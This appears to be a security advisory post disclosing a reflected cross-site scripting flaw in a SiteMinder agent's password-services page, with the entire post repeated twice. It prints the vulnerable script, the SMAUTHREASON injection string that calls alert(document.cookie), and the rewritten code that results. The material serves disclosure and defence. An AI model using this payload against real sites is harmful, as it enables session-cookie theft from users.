overet@securitydate.it
11/11/07, 20:14
I don't know the details of vulnerable version but smpwservices.fcc page was accessed directly in the tested version.
Exploit code was triggered like this:
with the URL:
https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=X
I can view this javascript code in the result page:
---
function resetCredFields()
{
if (X == 0 || X == 4 || X == 5 || X == 28 || X == 30 )
{
document.PWChange.PASSWORD.value = '';
}
else if (X == 1 || X == 18 || X == 20 || X == 22 || X == 31 || X == 34)
{
document.PWChange.NEWPASSWORD.value = '';
document.PWChange.CONFIRMATION.value = '';
}
}
---
this function was called by:
<BODY onLoad = 'resetCredFields();'>
Inserting the string "1)alert(document.cookie);}function+drop(){if(0" as SMAUTHREASON value we can modify resetCredFields() in this way:
function resetCredFields()
{
if (1)alert(document.cookie);}function drop(){if(0 == 0 || 1)alert(document.cookie);}function drop(){if(0 == 4 || 1)alert(document.cookie);}function drop(){if(0 == 5 || 1)alert(document.cookie);}function drop(){if(0 == 28 || 1)alert(document.cookie);}function drop(){if(0 == 30 )
{
document.PWChange.PASSWORD.value = '';
}
else if (1)alert(document.cookie);}function drop(){if(0 == 1 || 1)alert(document.cookie);}function drop(){if(0 == 18 || 1)alert(document.cookie);}function drop(){if(0 == 20 || 1)alert(document.cookie);}function drop(){if(0 == 22 || 1)alert(document.cookie);}function drop(){if(0 == 31 || 1)alert(document.cookie);}function drop(){if(0 == 34)
{
document.PWChange.NEWPASSWORD.value = '';
document.PWChange.CONFIRMATION.value = '';
}
}
So, the alert code was executed.
Regards,
Giuseppe Gottardi
Exploit code was triggered like this:
with the URL:
https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=X
I can view this javascript code in the result page:
---
function resetCredFields()
{
if (X == 0 || X == 4 || X == 5 || X == 28 || X == 30 )
{
document.PWChange.PASSWORD.value = '';
}
else if (X == 1 || X == 18 || X == 20 || X == 22 || X == 31 || X == 34)
{
document.PWChange.NEWPASSWORD.value = '';
document.PWChange.CONFIRMATION.value = '';
}
}
---
this function was called by:
<BODY onLoad = 'resetCredFields();'>
Inserting the string "1)alert(document.cookie);}function+drop(){if(0" as SMAUTHREASON value we can modify resetCredFields() in this way:
function resetCredFields()
{
if (1)alert(document.cookie);}function drop(){if(0 == 0 || 1)alert(document.cookie);}function drop(){if(0 == 4 || 1)alert(document.cookie);}function drop(){if(0 == 5 || 1)alert(document.cookie);}function drop(){if(0 == 28 || 1)alert(document.cookie);}function drop(){if(0 == 30 )
{
document.PWChange.PASSWORD.value = '';
}
else if (1)alert(document.cookie);}function drop(){if(0 == 1 || 1)alert(document.cookie);}function drop(){if(0 == 18 || 1)alert(document.cookie);}function drop(){if(0 == 20 || 1)alert(document.cookie);}function drop(){if(0 == 22 || 1)alert(document.cookie);}function drop(){if(0 == 31 || 1)alert(document.cookie);}function drop(){if(0 == 34)
{
document.PWChange.NEWPASSWORD.value = '';
document.PWChange.CONFIRMATION.value = '';
}
}
So, the alert code was executed.
Regards,
Giuseppe Gottardi